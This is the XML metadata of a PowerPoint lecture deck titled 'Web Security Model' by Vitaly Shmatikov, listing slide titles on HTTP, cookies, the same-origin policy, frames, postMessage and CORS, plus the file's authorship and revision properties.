      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>SavonVTI</vt:lpstr>
      <vt:lpstr>Web SECURITY MODEL  Vitaly Shmatikov</vt:lpstr>
      <vt:lpstr>Browser and Network</vt:lpstr>
      <vt:lpstr>HTTP: HyperText Transfer Protocol</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>HTTP/2</vt:lpstr>
      <vt:lpstr>How Website Can Store Info in Browser</vt:lpstr>
      <vt:lpstr>What Are Cookies Used For?</vt:lpstr>
      <vt:lpstr>Goals of  Web Security</vt:lpstr>
      <vt:lpstr>All of These Should Be Safe</vt:lpstr>
      <vt:lpstr>Two Sides of Web Security</vt:lpstr>
      <vt:lpstr>Browser’s View</vt:lpstr>
      <vt:lpstr>Web Server’s View</vt:lpstr>
      <vt:lpstr>Where Does the Attacker Live?</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Web Attacker</vt:lpstr>
      <vt:lpstr>OS vs. Browser Analogies</vt:lpstr>
      <vt:lpstr>Browser:  Basic Execution Model</vt:lpstr>
      <vt:lpstr>HTML and Scripts</vt:lpstr>
      <vt:lpstr>Event-Driven Script Execution</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript History</vt:lpstr>
      <vt:lpstr>Common Uses of JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript in Webpages</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Browser and Document Structure </vt:lpstr>
      <vt:lpstr>Reading DOM with JavaScript</vt:lpstr>
      <vt:lpstr>Manipulating DOM with JavaScript</vt:lpstr>
      <vt:lpstr>Web Content Comes from Many Sources</vt:lpstr>
      <vt:lpstr>Browser Sandbox</vt:lpstr>
      <vt:lpstr>Same Origin Policy for DOM</vt:lpstr>
      <vt:lpstr>Setting Cookies by Server</vt:lpstr>
      <vt:lpstr>Setting Cookies by Server</vt:lpstr>
      <vt:lpstr>Setting Cookies by Server</vt:lpstr>
      <vt:lpstr>Cookie Are Identified by (domain, name, path)</vt:lpstr>
      <vt:lpstr>SOP for Writing Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sending Cookies by Browser</vt:lpstr>
      <vt:lpstr>SOP for Sending Cookies</vt:lpstr>
      <vt:lpstr>Examples of Cookie SOP</vt:lpstr>
      <vt:lpstr>What Does The Server Know About the Cookie Sent by the Browser?</vt:lpstr>
      <vt:lpstr>Who Set the Cookie?</vt:lpstr>
      <vt:lpstr>Overwriting “Secure” Cookies</vt:lpstr>
      <vt:lpstr>Accessing Cookies via DOM</vt:lpstr>
      <vt:lpstr>SOP Quiz #1</vt:lpstr>
      <vt:lpstr>Path Separation Is Not Secure</vt:lpstr>
      <vt:lpstr>SOP Does Not Control Sending</vt:lpstr>
      <vt:lpstr>Sending a Cross-Domain GET</vt:lpstr>
      <vt:lpstr>Using Images to Send Data</vt:lpstr>
      <vt:lpstr>SOP for HTTP Responses</vt:lpstr>
      <vt:lpstr>Importing Scripts</vt:lpstr>
      <vt:lpstr>Sub-Resource Integrity Problem</vt:lpstr>
      <vt:lpstr>Sub-Resource Integrity (SRI)</vt:lpstr>
      <vt:lpstr>Enforcing SRI Using CSP</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Same Origin Policy for Frames</vt:lpstr>
      <vt:lpstr>BroadcastChannel API</vt:lpstr>
      <vt:lpstr>Can These Communicate?</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>How About This?</vt:lpstr>
      <vt:lpstr>Cross-Origin Communication</vt:lpstr>
      <vt:lpstr>postMessage</vt:lpstr>
      <vt:lpstr>JS Can Make Network Requests</vt:lpstr>
      <vt:lpstr>Cross-Origin JS Requests</vt:lpstr>
      <vt:lpstr>CORS</vt:lpstr>
      <vt:lpstr>CORS Example</vt:lpstr>
      <vt:lpstr>CORS Example</vt:lpstr>
      <vt:lpstr>CORS Example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security model</dc:title>
  <dc:subject/>
  <dc:creator>Vitaly Shmatikov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vitaly Shmatikov</cp:lastModifiedBy>
  <cp:revision>237</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T21:02:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-23T01:08:36Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>